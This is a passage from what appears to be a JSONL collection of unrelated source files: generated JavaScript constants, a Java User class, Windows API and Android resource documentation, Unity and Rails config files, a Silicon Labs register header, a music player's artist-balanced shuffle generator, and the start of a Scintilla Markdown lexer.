530;\nexport let a531 = 531;\nexport let a532 = 532;\nexport let a533 = 533;\nexport let a534 = 534;\nexport let a535 = 535;\nexport let a536 = 536;\nexport let a537 = 537;\nexport let a538 = 538;\nexport let a539 = 539;\nexport let a540 = 540;\nexport let a541 = 541;\nexport let a542 = 542;\nexport let a543 = 543;\nexport let a544 = 544;\nexport let a545 = 545;\nexport let a546 = 546;\nexport let a547 = 547;\nexport let a548 = 548;\nexport let a549 = 549;\nexport let a550 = 550;\nexport let a551 = 551;\nexport let a552 = 552;\nexport let a553 = 553;\nexport let a554 = 554;\nexport let a555 = 555;\nexport let a556 = 556;\nexport let a557 = 557;\nexport let a558 = 558;\nexport let a559 = 559;\nexport let a560 = 560;\nexport let a561 = 561;\nexport let a562 = 562;\nexport let a563 = 563;\nexport let a564 = 564;\nexport let a565 = 565;\nexport let a566 = 566;\nexport let a567 = 567;\nexport let a568 = 568;\nexport let a569 = 569;\nexport let a570 = 570;\nexport let a571 = 571;\nexport let a572 = 572;\nexport let a573 = 573;\nexport let a574 = 574;\nexport let a575 = 575;\nexport let a576 = 576;\nexport let a577 = 577;\nexport let a578 = 578;\nexport let a579 = 579;\nexport let a580 = 580;\nexport let a581 = 581;\nexport let a582 = 582;\nexport let a583 = 583;\nexport let a584 = 584;\nexport let a585 = 585;\nexport let a586 = 586;\nexport let a587 = 587;\nexport let a588 = 588;\nexport let a589 = 589;\nexport let a590 = 590;\nexport let a591 = 591;\nexport let a592 = 592;\nexport let a593 = 593;\nexport let a594 = 594;\nexport let a595 = 595;\nexport let a596 = 596;\nexport let a597 = 597;\nexport let a598 = 598;\nexport let a599 = 599;\nexport let a600 = 600;\nexport let a601 = 601;\nexport let a602 = 602;\nexport let a603 = 603;\nexport let a604 = 604;\nexport let a605 = 605;\nexport let a606 = 606;\nexport let a607 = 607;\nexport let a608 = 608;\nexport let a609 = 609;\nexport let a610 = 610;\nexport let a611 = 611;\nexport let a612 = 612;\nexport let a613 = 613;\nexport let a614 = 614;\nexport let a615 = 615;\nexport let a616 = 616;\nexport let a617 = 617;\nexport let a618 = 618;\nexport let a619 = 619;\nexport let a620 = 620;\nexport let a621 = 621;\nexport let a622 = 622;\nexport let a623 = 623;\nexport let a624 = 624;\nexport let a625 = 625;\nexport let a626 = 626;\nexport let a627 = 627;\nexport let a628 = 628;\nexport let a629 = 629;\nexport let a630 = 630;\nexport let a631 = 631;\nexport let a632 = 632;\nexport let a633 = 633;\nexport let a634 = 634;\nexport let a635 = 635;\nexport let a636 = 636;\nexport let a637 = 637;\nexport let a638 = 638;\nexport let a639 = 639;\nexport let a640 = 640;\nexport let a641 = 641;\nexport let a642 = 642;\nexport let a643 = 643;\nexport let a644 = 644;\nexport let a645 = 645;\nexport let a646 = 646;\nexport let a647 = 647;\nexport let a648 = 648;\nexport let a649 = 649;\nexport let a650 = 650;\nexport let a651 = 651;\nexport let a652 = 652;\nexport let a653 = 653;\nexport let a654 = 654;\nexport let a655 = 655;\nexport let a656 = 656;\nexport let a657 = 657;\nexport let a658 = 658;\nexport let a659 = 659;\nexport let a660 = 660;\nexport let a661 = 661;\nexport let a662 = 662;\nexport let a663 = 663;\nexport let a664 = 664;\nexport let a665 = 665;\nexport let a666 = 666;\nexport let a667 = 667;\nexport let a668 = 668;\nexport let a669 = 669;\nexport let a670 = 670;\nexport let a671 = 671;\nexport let a672 = 672;\nexport let a673 = 673;\nexport let a674 = 674;\nexport let a675 = 675;\nexport let a676 = 676;\nexport let a677 = 677;\nexport let a678 = 
678;\nexport let a679 = 679;\nexport let a680 = 680;\nexport let a681 = 681;\nexport let a682 = 682;\nexport let a683 = 683;\nexport let a684 = 684;\nexport let a685 = 685;\nexport let a686 = 686;\nexport let a687 = 687;\nexport let a688 = 688;\nexport let a689 = 689;\nexport let a690 = 690;\nexport let a691 = 691;\nexport let a692 = 692;\nexport let a693 = 693;\nexport let a694 = 694;\nexport let a695 = 695;\nexport let a696 = 696;\nexport let a697 = 697;\nexport let a698 = 698;\nexport let a699 = 699;\nexport let a700 = 700;\nexport let a701 = 701;\nexport let a702 = 702;\nexport let a703 = 703;\nexport let a704 = 704;\nexport let a705 = 705;\nexport let a706 = 706;\nexport let a707 = 707;\nexport let a708 = 708;\nexport let a709 = 709;\nexport let a710 = 710;\nexport let a711 = 711;\nexport let a712 = 712;\nexport let a713 = 713;\nexport let a714 = 714;\nexport let a715 = 715;\nexport let a716 = 716;\nexport let a717 = 717;\nexport let a718 = 718;\nexport let a719 = 719;\nexport let a720 = 720;\nexport let a721 = 721;\nexport let a722 = 722;\nexport let a723 = 723;\nexport let a724 = 724;\nexport let a725 = 725;\nexport let a726 = 726;\nexport let a727 = 727;\nexport let a728 = 728;\nexport let a729 = 729;\nexport let a730 = 730;\nexport let a731 = 731;\nexport let a732 = 732;\nexport let a733 = 733;\nexport let a734 = 734;\nexport let a735 = 735;\nexport let a736 = 736;\nexport let a737 = 737;\nexport let a738 = 738;\nexport let a739 = 739;\nexport let a740 = 740;\nexport let a741 = 741;\nexport let a742 = 742;\nexport let a743 = 743;\nexport let a744 = 744;\nexport let a745 = 745;\nexport let a746 = 746;\nexport let a747 = 747;\nexport let a748 = 748;\nexport let a749 = 749;\nexport let a750 = 750;\nexport let a751 = 751;\nexport let a752 = 752;\nexport let a753 = 753;\nexport let a754 = 754;\nexport let a755 = 755;\nexport let a756 = 756;\nexport let a757 = 757;\nexport let a758 = 758;\nexport let a759 = 759;\nexport let a760 = 760;\nexport let a761 = 761;\nexport let a762 = 762;\nexport let a763 = 763;\nexport let a764 = 764;\nexport let a765 = 765;\nexport let a766 = 766;\nexport let a767 = 767;\nexport let a768 = 768;\nexport let a769 = 769;\nexport let a770 = 770;\nexport let a771 = 771;\nexport let a772 = 772;\nexport let a773 = 773;\nexport let a774 = 774;\nexport let a775 = 775;\nexport let a776 = 776;\nexport let a777 = 777;\nexport let a778 = 778;\nexport let a779 = 779;\nexport let a780 = 780;\nexport let a781 = 781;\nexport let a782 = 782;\nexport let a783 = 783;\nexport let a784 = 784;\nexport let a785 = 785;\nexport let a786 = 786;\nexport let a787 = 787;\nexport let a788 = 788;\nexport let a789 = 789;\nexport let a790 = 790;\nexport let a791 = 791;\nexport let a792 = 792;\nexport let a793 = 793;\nexport let a794 = 794;\nexport let a795 = 795;\nexport let a796 = 796;\nexport let a797 = 797;\nexport let a798 = 798;\nexport let a799 = 799;\nexport let a800 = 800;\nexport let a801 = 801;\nexport let a802 = 802;\nexport let a803 = 803;\nexport let a804 = 804;\nexport let a805 = 805;\nexport let a806 = 806;\nexport let a807 = 807;\nexport let a808 = 808;\nexport let a809 = 809;\nexport let a810 = 810;\nexport let a811 = 811;\nexport let a812 = 812;\nexport let a813 = 813;\nexport let a814 = 814;\nexport let a815 = 815;\nexport let a816 = 816;\nexport let a817 = 817;\nexport let a818 = 818;\nexport let a819 = 819;\nexport let a820 = 820;\nexport let a821 = 821;\nexport let a822 = 822;\nexport let a823 = 823;\nexport let a824 = 824;\nexport let a825 = 825;\nexport let a826 = 
826;\nexport let a827 = 827;\nexport let a828 = 828;\nexport let a829 = 829;\nexport let a830 = 830;\nexport let a831 = 831;\nexport let a832 = 832;\nexport let a833 = 833;\nexport let a834 = 834;\nexport let a835 = 835;\nexport let a836 = 836;\nexport let a837 = 837;\nexport let a838 = 838;\nexport let a839 = 839;\nexport let a840 = 840;\nexport let a841 = 841;\nexport let a842 = 842;\nexport let a843 = 843;\nexport let a844 = 844;\nexport let a845 = 845;\nexport let a846 = 846;\nexport let a847 = 847;\nexport let a848 = 848;\nexport let a849 = 849;\nexport let a850 = 850;\nexport let a851 = 851;\nexport let a852 = 852;\nexport let a853 = 853;\nexport let a854 = 854;\nexport let a855 = 855;\nexport let a856 = 856;\nexport let a857 = 857;\nexport let a858 = 858;\nexport let a859 = 859;\nexport let a860 = 860;\nexport let a861 = 861;\nexport let a862 = 862;\nexport let a863 = 863;\nexport let a864 = 864;\nexport let a865 = 865;\nexport let a866 = 866;\nexport let a867 = 867;\nexport let a868 = 868;\nexport let a869 = 869;\nexport let a870 = 870;\nexport let a871 = 871;\nexport let a872 = 872;\nexport let a873 = 873;\nexport let a874 = 874;\nexport let a875 = 875;\nexport let a876 = 876;\nexport let a877 = 877;\nexport let a878 = 878;\nexport let a879 = 879;\nexport let a880 = 880;\nexport let a881 = 881;\nexport let a882 = 882;\nexport let a883 = 883;\nexport let a884 = 884;\nexport let a885 = 885;\nexport let a886 = 886;\nexport let a887 = 887;\nexport let a888 = 888;\nexport let a889 = 889;\nexport let a890 = 890;\nexport let a891 = 891;\nexport let a892 = 892;\nexport let a893 = 893;\nexport let a894 = 894;\nexport let a895 = 895;\nexport let a896 = 896;\nexport let a897 = 897;\nexport let a898 = 898;\nexport let a899 = 899;\nexport let a900 = 900;\nexport let a901 = 901;\nexport let a902 = 902;\nexport let a903 = 903;\nexport let a904 = 904;\nexport let a905 = 905;\nexport let a906 = 906;\nexport let a907 = 907;\nexport let a908 = 908;\nexport let a909 = 909;\nexport let a910 = 910;\nexport let a911 = 911;\nexport let a912 = 912;\nexport let a913 = 913;\nexport let a914 = 914;\nexport let a915 = 915;\nexport let a916 = 916;\nexport let a917 = 917;\nexport let a918 = 918;\nexport let a919 = 919;\nexport let a920 = 920;\nexport let a921 = 921;\nexport let a922 = 922;\nexport let a923 = 923;\nexport let a924 = 924;\nexport let a925 = 925;\nexport let a926 = 926;\nexport let a927 = 927;\nexport let a928 = 928;\nexport let a929 = 929;\nexport let a930 = 930;\nexport let a931 = 931;\nexport let a932 = 932;\nexport let a933 = 933;\nexport let a934 = 934;\nexport let a935 = 935;\nexport let a936 = 936;\nexport let a937 = 937;\nexport let a938 = 938;\nexport let a939 = 939;\nexport let a940 = 940;\nexport let a941 = 941;\nexport let a942 = 942;\nexport let a943 = 943;\nexport let a944 = 944;\nexport let a945 = 945;\nexport let a946 = 946;\nexport let a947 = 947;\nexport let a948 = 948;\nexport let a949 = 949;\nexport let a950 = 950;\nexport let a951 = 951;\nexport let a952 = 952;\nexport let a953 = 953;\nexport let a954 = 954;\nexport let a955 = 955;\nexport let a956 = 956;\nexport let a957 = 957;\nexport let a958 = 958;\nexport let a959 = 959;\nexport let a960 = 960;\nexport let a961 = 961;\nexport let a962 = 962;\nexport let a963 = 963;\nexport let a964 = 964;\nexport let a965 = 965;\nexport let a966 = 966;\nexport let a967 = 967;\nexport let a968 = 968;\nexport let a969 = 969;\nexport let a970 = 970;\nexport let a971 = 971;\nexport let a972 = 972;\nexport let a973 = 973;\nexport let a974 = 
974;\nexport let a975 = 975;\nexport let a976 = 976;\nexport let a977 = 977;\nexport let a978 = 978;\nexport let a979 = 979;\nexport let a980 = 980;\nexport let a981 = 981;\nexport let a982 = 982;\nexport let a983 = 983;\nexport let a984 = 984;\nexport let a985 = 985;\nexport let a986 = 986;\nexport let a987 = 987;\nexport let a988 = 988;\nexport let a989 = 989;\nexport let a990 = 990;\nexport let a991 = 991;\nexport let a992 = 992;\nexport let a993 = 993;\nexport let a994 = 994;\nexport let a995 = 995;\nexport let a996 = 996;\nexport let a997 = 997;\nexport let a998 = 998;\nexport let a999 = 999;\nexport let a1000 = 1000;\nexport let a1001 = 1001;\nexport let a1002 = 1002;\nexport let a1003 = 1003;\nexport let a1004 = 1004;\nexport let a1005 = 1005;\nexport let a1006 = 1006;\nexport let a1007 = 1007;\nexport let a1008 = 1008;\nexport let a1009 = 1009;\nexport let a1010 = 1010;\nexport let a1011 = 1011;\nexport let a1012 = 1012;\nexport let a1013 = 1013;\nexport let a1014 = 1014;\nexport let a1015 = 1015;\nexport let a1016 = 1016;\nexport let a1017 = 1017;\nexport let a1018 = 1018;\nexport let a1019 = 1019;\nexport let a1020 = 1020;\nexport let a1021 = 1021;\nexport let a1022 = 1022;\nexport let a1023 = 1023;\nexport let a1024 = 1024;\nexport let a1025 = 1025;\nexport let a1026 = 1026;\nexport let a1027 = 1027;\nexport let a1028 = 1028;\nexport let a1029 = 1029;\nexport let a1030 = 1030;\nexport let a1031 = 1031;\nexport let a1032 = 1032;\nexport let a1033 = 1033;\nexport let a1034 = 1034;\nexport let a1035 = 1035;\nexport let a1036 = 1036;\nexport let a1037 = 1037;\nexport let a1038 = 1038;\nexport let a1039 = 1039;\nexport let a1040 = 1040;\nexport let a1041 = 1041;\nexport let a1042 = 1042;\nexport let a1043 = 1043;\nexport let a1044 = 1044;\nexport let a1045 = 1045;\nexport let a1046 = 1046;\nexport let a1047 = 1047;\nexport let a1048 = 1048;\nexport let a1049 = 1049;\nexport let a1050 = 1050;\nexport let a1051 = 1051;\nexport let a1052 = 1052;\nexport let a1053 = 1053;\nexport let a1054 = 1054;\nexport let a1055 = 1055;\nexport let a1056 = 1056;\nexport let a1057 = 1057;\nexport let a1058 = 1058;\nexport let a1059 = 1059;\nexport let a1060 = 1060;\nexport let a1061 = 1061;\nexport let a1062 = 1062;\nexport let a1063 = 1063;\nexport let a1064 = 1064;\nexport let a1065 = 1065;\nexport let a1066 = 1066;\nexport let a1067 = 1067;\nexport let a1068 = 1068;\nexport let a1069 = 1069;\nexport let a1070 = 1070;\nexport let a1071 = 1071;\nexport let a1072 = 1072;\nexport let a1073 = 1073;\nexport let a1074 = 1074;\nexport let a1075 = 1075;\nexport let a1076 = 1076;\nexport let a1077 = 1077;\nexport let a1078 = 1078;\nexport let a1079 = 1079;\nexport let a1080 = 1080;\nexport let a1081 = 1081;\nexport let a1082 = 1082;\nexport let a1083 = 1083;\nexport let a1084 = 1084;\nexport let a1085 = 1085;\nexport let a1086 = 1086;\nexport let a1087 = 1087;\nexport let a1088 = 1088;\nexport let a1089 = 1089;\nexport let a1090 = 1090;\nexport let a1091 = 1091;\nexport let a1092 = 1092;\nexport let a1093 = 1093;\nexport let a1094 = 1094;\nexport let a1095 = 1095;\nexport let a1096 = 1096;\nexport let a1097 = 1097;\nexport let a1098 = 1098;\nexport let a1099 = 1099;\n"} {"text": "/*******************************************************************************\n * Copyright (c) 2015 EclipseSource and others.\n * All rights reserved. 
This program and the accompanying materials\n * are made available under the terms of the Eclipse Public License v1.0\n * which accompanies this distribution, and is available at\n * http://www.eclipse.org/legal/epl-v10.html\n *\n * Contributors:\n * Holger Staudacher - initial API and implementation\n ******************************************************************************/\npackage com.eclipsesource.jaxrs.connector.example.swagger;\n\n\npublic class User {\n\n private final String name;\n private final String email;\n\n public User( String name, String email) {\n this.name = name;\n this.email = email;\n }\n\n public String getName() {\n return name;\n }\n\n public String getEmail() {\n return email;\n }\n\n @Override\n public int hashCode() {\n final int prime = 31;\n int result = 1;\n result = prime * result + ( ( email == null ) ? 0 : email.hashCode() );\n result = prime * result + ( ( name == null ) ? 0 : name.hashCode() );\n return result;\n }\n\n @Override\n public boolean equals( Object obj ) {\n if( this == obj )\n return true;\n if( obj == null )\n return false;\n if( getClass() != obj.getClass() )\n return false;\n User other = ( User )obj;\n if( email == null ) {\n if( other.email != null )\n return false;\n } else if( !email.equals( other.email ) )\n return false;\n if( name == null ) {\n if( other.name != null )\n return false;\n } else if( !name.equals( other.name ) )\n return false;\n return true;\n }\n\n}\n"} {"text": "---\n-api-id: P:Windows.Devices.Sms.SmsAppMessage.ProtocolId\n-api-type: winrt property\n-api-device-family-note: xbox\n---\n\n\n\n# Windows.Devices.Sms.SmsAppMessage.ProtocolId\n\n## -description\nThe Protocol identifier for the message.\n\n## -property-value\nThe Protocol identifier for the message. (3GPP2 only.)\n\n## -remarks\n\n## -examples\n\n## -see-also\n\n\n## -capabilities\ncellularMessaging, sms\n"} {"text": "Images, layout descriptions, binary blobs and string dictionaries can be included \nin your application as resource files. Various Android APIs are designed to \noperate on the resource IDs instead of dealing with images, strings or binary blobs \ndirectly.\n\nFor example, a sample Android app that contains a user interface layout (main.axml),\nan internationalization string table (strings.xml) and some icons (drawable-XXX/icon.png) \nwould keep its resources in the \"Resources\" directory of the application:\n\nResources/\n drawable/\n icon.png\n\n layout/\n main.axml\n\n values/\n strings.xml\n\nIn order to get the build system to recognize Android resources, set the build action to\n\"AndroidResource\". The native Android APIs do not operate directly with filenames, but \ninstead operate on resource IDs. When you compile an Android application that uses resources, \nthe build system will package the resources for distribution and generate a class called \"R\" \n(this is an Android convention) that contains the tokens for each one of the resources \nincluded. 
For example, for the above Resources layout, this is what the R class would expose:\n\npublic class R {\n public class drawable {\n public const int icon = 0x123;\n }\n\n public class layout {\n public const int main = 0x456;\n }\n\n public class strings {\n public const int first_string = 0xabc;\n public const int second_string = 0xbcd;\n }\n}\n\nYou would then use R.drawable.icon to reference the drawable/icon.png file, or R.layout.main \nto reference the layout/main.axml file, or R.strings.first_string to reference the first \nstring in the dictionary file values/strings.xml.\n"} {"text": "fileFormatVersion: 2\nguid: 1b295e0457695334c98721cd922e1849\ntimeCreated: 1496002504\nlicenseType: Pro\nMonoImporter:\n serializedVersion: 2\n defaultReferences: []\n executionOrder: 0\n icon: {instanceID: 0}\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "/***************************************************************************//**\n * @file\n * @brief EFR32MG12P_RTCC_RET register and bit field definitions\n * @version 5.8.3\n *******************************************************************************\n * # License\n * Copyright 2019 Silicon Laboratories Inc. www.silabs.com\n *******************************************************************************\n *\n * SPDX-License-Identifier: Zlib\n *\n * The licensor of this software is Silicon Laboratories Inc.\n *\n * This software is provided 'as-is', without any express or implied\n * warranty. In no event will the authors be held liable for any damages\n * arising from the use of this software.\n *\n * Permission is granted to anyone to use this software for any purpose,\n * including commercial applications, and to alter it and redistribute it\n * freely, subject to the following restrictions:\n *\n * 1. The origin of this software must not be misrepresented; you must not\n * claim that you wrote the original software. If you use this software\n * in a product, an acknowledgment in the product documentation would be\n * appreciated but is not required.\n * 2. Altered source versions must be plainly marked as such, and must not be\n * misrepresented as being the original software.\n * 3. This notice may not be removed or altered from any source distribution.\n *\n ******************************************************************************/\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n\n#if defined(__ICCARM__)\n#pragma system_include /* Treat file as system include file. */\n#elif defined(__ARMCC_VERSION) && (__ARMCC_VERSION >= 6010050)\n#pragma clang system_header /* Treat file as system include file. 
*/\n#endif\n\n/***************************************************************************//**\n * @addtogroup Parts\n * @{\n ******************************************************************************/\n/***************************************************************************//**\n * @brief RTCC_RET RTCC RET Register\n * @ingroup EFR32MG12P_RTCC\n ******************************************************************************/\ntypedef struct {\n __IOM uint32_t REG; /**< Retention Register */\n} RTCC_RET_TypeDef;\n\n/** @} End of group Parts */\n#ifdef __cplusplus\n}\n#endif\n\n"} {"text": "// This is a manifest file that'll be compiled into application.js, which will include all the files\n// listed below.\n//\n// Any JavaScript/Coffee file within this directory, lib/assets/javascripts, or any plugin's\n// vendor/assets/javascripts directory can be referenced here using a relative path.\n//\n// It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the\n// compiled file. JavaScript code in this file should be added after the last require_* statement.\n//\n// Read Sprockets README (https://github.com/rails/sprockets#sprockets-directives) for details\n// about supported directives.\n//\n//= require rails-ujs\n//= require activestorage\n//= require turbolinks\n//= require_tree .\n"} {"text": "/*\n * Copyright (C) 2020 Team Gateship-One\n * (Hendrik Borghorst & Frederik Luetkes)\n *\n * The AUTHORS.md file contains a detailed contributors list:\n * \n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n *\n */\n\npackage org.gateshipone.odyssey.models;\n\nimport android.util.Log;\n\nimport org.gateshipone.odyssey.BuildConfig;\n\nimport java.util.ArrayList;\nimport java.util.Collections;\nimport java.util.LinkedHashMap;\nimport java.util.List;\nimport java.util.Random;\n\n/**\n * This class keeps a HashMap of all artists that are part of a track list (e.g. playlist)\n * and their belonging tracks with the original list position as a pair. 
This can be used to\n * randomize the playback of the playback equally distributed over all artists of the original\n * track list.\n */\npublic class TrackRandomGenerator {\n private static final String TAG = TrackRandomGenerator.class.getSimpleName();\n\n /**\n * Underlying data structure for artist-track buckets\n */\n private ArrayList> mData;\n\n /**\n * Creates an empty data structure\n */\n public TrackRandomGenerator() {\n mData = new ArrayList<>();\n }\n\n private BetterPseudoRandomGenerator mRandomGenerator = new BetterPseudoRandomGenerator();\n\n private List mOriginalList;\n\n private int mIntelligenceFactor;\n\n /**\n * Creates a list of artists and their tracks with position in the original playlist\n *\n * @param tracks List of tracks\n */\n public synchronized void fillFromList(List tracks) {\n // Clear all entries\n mData.clear();\n\n mOriginalList = tracks;\n\n if (mIntelligenceFactor == 0) {\n return;\n }\n LinkedHashMap> hashMap = new LinkedHashMap<>();\n\n if (tracks == null || tracks.isEmpty()) {\n // Abort for empty data structures\n return;\n }\n\n // Iterate over the list and add all tracks to their artist lists\n int trackNo = 0;\n for (TrackModel track : tracks) {\n String artistName = track.getTrackArtistName();\n List list = hashMap.get(artistName);\n if (list == null) {\n // If artist is not already in HashMap add a new list for it\n list = new ArrayList<>();\n hashMap.put(artistName, list);\n }\n // Add pair of position in original playlist and track itself to artists bucket list\n list.add(trackNo);\n\n // Increase the track number (index) of the original playlist\n trackNo++;\n }\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Recreated buckets with: \" + hashMap.size() + \" artists\");\n }\n\n mData.addAll(hashMap.values());\n Collections.shuffle(mData);\n }\n\n /**\n * Generates a randomized track number within the original track list, that was used for the call\n * of fillFromList. 
The random track number should be equally distributed over all artists.\n *\n * @return A random number of a track of the original track list\n */\n public synchronized int getRandomTrackNumber() {\n // Randomize if a more balanced (per artist) approach or a traditional approach should be used\n boolean smartRandom = mRandomGenerator.getLimitedRandomNumber(100) < mIntelligenceFactor;\n\n if (smartRandom) {\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Use smart random\");\n }\n if (mData.isEmpty()) {\n // Refill list from original list\n fillFromList(mOriginalList);\n }\n\n // First level random, get artist\n int randomArtistNumber = mRandomGenerator.getLimitedRandomNumber(mData.size());\n\n // Get artists bucket list to artist number\n List artistsTracks;\n\n\n // Get the list of tracks belonging to the selected artist\n artistsTracks = mData.get(randomArtistNumber);\n\n // Check if an artist was found\n if (artistsTracks == null) {\n return 0;\n }\n\n int randomTrackNo = mRandomGenerator.getLimitedRandomNumber(artistsTracks.size());\n\n Integer songNumber = artistsTracks.get(randomTrackNo);\n\n // Remove track to prevent double plays\n artistsTracks.remove(randomTrackNo);\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Tracks from artist left: \" + artistsTracks.size());\n }\n\n // Check if tracks from this artist are left, otherwise remove the artist\n if (artistsTracks.isEmpty()) {\n // No tracks left from artist, remove from map\n mData.remove(randomArtistNumber);\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Artists left: \" + mData.size());\n }\n }\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Selected artist no.: \" + randomArtistNumber + \" with internal track no.: \" + randomTrackNo + \" and original track no.: \" + songNumber);\n }\n // Get random track number\n return songNumber;\n } else {\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Use traditional random\");\n }\n return mRandomGenerator.getLimitedRandomNumber(mOriginalList.size());\n }\n }\n\n public void setEnabled(int factor) {\n if (mIntelligenceFactor == 0 && factor != 0) {\n // Redo track buckets\n fillFromList(mOriginalList);\n } else if (mIntelligenceFactor != 0 && factor == 0) {\n // Remove track buckets\n fillFromList(null);\n }\n mIntelligenceFactor = factor;\n }\n\n private static class BetterPseudoRandomGenerator {\n /**\n * Timeout in ns (1 second)\n */\n private final static long TIMEOUT_NS = 10000000000L;\n private Random mJavaGenerator;\n\n private static final int RAND_MAX = Integer.MAX_VALUE;\n\n /**\n * Value after how many random numbers a reseed is done\n */\n private static final int RESEED_COUNT = 20;\n\n private int mNumbersGiven = 0;\n\n private int mInternalSeed;\n\n\n private BetterPseudoRandomGenerator() {\n mJavaGenerator = new Random();\n\n // Initialize internal seed\n mInternalSeed = mJavaGenerator.nextInt();\n\n\n // Do a quick check\n //testDistribution(20,20);\n }\n\n private int getInternalRandomNumber() {\n /*\n * Marsaglia, \"Xorshift RNGs\"\n */\n int newSeed = mInternalSeed;\n\n newSeed ^= newSeed << 13;\n newSeed ^= newSeed >> 17;\n newSeed ^= newSeed << 5;\n\n mNumbersGiven++;\n if (mNumbersGiven == RESEED_COUNT) {\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Reseeded PRNG\");\n }\n mInternalSeed = mJavaGenerator.nextInt();\n mNumbersGiven = 0;\n } else {\n mInternalSeed = newSeed;\n }\n return Math.abs(newSeed);\n }\n\n int getLimitedRandomNumber(int limit) {\n if (limit == 0) {\n return 0;\n }\n int r, d = RAND_MAX / limit;\n limit *= d;\n long startTime = System.nanoTime();\n do {\n r = 
getInternalRandomNumber();\n if ((System.nanoTime() - startTime) > TIMEOUT_NS) {\n if (BuildConfig.DEBUG) {\n Log.w(TAG, \"Random generation timed out\");\n }\n // Fallback to java generator\n return mJavaGenerator.nextInt(limit);\n }\n } while (r >= limit);\n return r / d;\n }\n\n\n private void testDistribution(int numberLimit, int runs) {\n int[] numberCount = new int[numberLimit];\n\n for (int i = 0; i < runs; i++) {\n numberCount[getLimitedRandomNumber(numberLimit)]++;\n }\n\n // Print distribution and calculate mean\n int arithmeticMean = 0;\n for (int i = 0; i < numberLimit; i++) {\n Log.v(TAG, \"Number: \" + i + \" = \" + numberCount[i]);\n arithmeticMean += numberCount[i];\n }\n\n arithmeticMean /= numberLimit;\n Log.v(TAG, \"Mean value: \" + arithmeticMean);\n\n int variance = 0;\n for (int i = 0; i < numberLimit; i++) {\n variance += Math.pow((numberCount[i] - arithmeticMean), 2);\n }\n Log.v(TAG, \"Variance: \" + variance);\n double sd = Math.sqrt(variance);\n Log.v(TAG, \"Standard deviation: \" + sd);\n double rsd = sd / arithmeticMean;\n Log.v(TAG, \"Relative standard deviation: \" + rsd + \" %\");\n\n }\n }\n}\n"} {"text": "/******************************************************************\n * LexMarkdown.cxx\n *\n * A simple Markdown lexer for scintilla.\n *\n * Includes highlighting for some extra features from the\n * Pandoc implementation; strikeout, using '#.' as a default\n * ordered list item marker, and delimited code blocks.\n *\n * Limitations:\n *\n * Standard indented code blocks are not highlighted at all,\n * as it would conflict with other indentation schemes. Use\n * delimited code blocks for blanket highlighting of an\n * entire code block. Embedded HTML is not highlighted either.\n * Blanket HTML highlighting has issues, because some Markdown\n * implementations allow Markdown markup inside of the HTML. Also,\n * there is a following blank line issue that can't be ignored,\n * explained in the next paragraph. Embedded HTML and code\n * blocks would be better supported with language specific\n * highlighting.\n *\n * The highlighting aims to accurately reflect correct syntax,\n * but a few restrictions are relaxed. 
Delimited code blocks are\n * highlighted, even if the line following the code block is not blank.\n * Requiring a blank line after a block, breaks the highlighting\n * in certain cases, because of the way Scintilla ends up calling\n * the lexer.\n *\n * Written by Jon Strait - jstrait@moonloop.net\n *\n * The License.txt file describes the conditions under which this\n * software may be distributed.\n *\n *****************************************************************/\n\n#include \n#include \n#include \n#include \n#include \n\n#include \"ILexer.h\"\n#include \"Scintilla.h\"\n#include \"SciLexer.h\"\n\n#include \"WordList.h\"\n#include \"LexAccessor.h\"\n#include \"Accessor.h\"\n#include \"StyleContext.h\"\n#include \"CharacterSet.h\"\n#include \"LexerModule.h\"\n\nusing namespace Scintilla;\n\nstatic inline bool IsNewline(const int ch) {\n return (ch == '\\n' || ch == '\\r');\n}\n\n// True if can follow ch down to the end with possibly trailing whitespace\nstatic bool FollowToLineEnd(const int ch, const int state, const Sci_PositionU endPos, StyleContext &sc) {\n Sci_PositionU i = 0;\n while (sc.GetRelative(++i) == ch)\n ;\n // Skip over whitespace\n while (IsASpaceOrTab(sc.GetRelative(i)) && sc.currentPos + i < endPos)\n ++i;\n if (IsNewline(sc.GetRelative(i)) || sc.currentPos + i == endPos) {\n sc.Forward(i);\n sc.ChangeState(state);\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n return true;\n }\n else return false;\n}\n\n// Set the state on text section from current to length characters,\n// then set the rest until the newline to default, except for any characters matching token\nstatic void SetStateAndZoom(const int state, const Sci_Position length, const int token, StyleContext &sc) {\n sc.SetState(state);\n sc.Forward(length);\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n sc.Forward();\n bool started = false;\n while (sc.More() && !IsNewline(sc.ch)) {\n if (sc.ch == token && !started) {\n sc.SetState(state);\n started = true;\n }\n else if (sc.ch != token) {\n sc.SetState(SCE_MARKDOWN_DEFAULT);\n started = false;\n }\n sc.Forward();\n }\n sc.SetState(SCE_MARKDOWN_LINE_BEGIN);\n}\n\n// Does the previous line have more than spaces and tabs?\nstatic bool HasPrevLineContent(StyleContext &sc) {\n Sci_Position i = 0;\n // Go back to the previous newline\n while ((--i + (Sci_Position)sc.currentPos) >= 0 && !IsNewline(sc.GetRelative(i)))\n ;\n while ((--i + (Sci_Position)sc.currentPos) >= 0) {\n if (IsNewline(sc.GetRelative(i)))\n break;\n if (!IsASpaceOrTab(sc.GetRelative(i)))\n return true;\n }\n return false;\n}\n\nstatic bool AtTermStart(StyleContext &sc) {\n return sc.currentPos == 0 || sc.chPrev == 0 || isspacechar(sc.chPrev);\n}\n\nstatic bool IsValidHrule(const Sci_PositionU endPos, StyleContext &sc) {\n int count = 1;\n Sci_PositionU i = 0;\n for (;;) {\n ++i;\n int c = sc.GetRelative(i);\n if (c == sc.ch)\n ++count;\n // hit a terminating character\n else if (!IsASpaceOrTab(c) || sc.currentPos + i == endPos) {\n // Are we a valid HRULE\n if 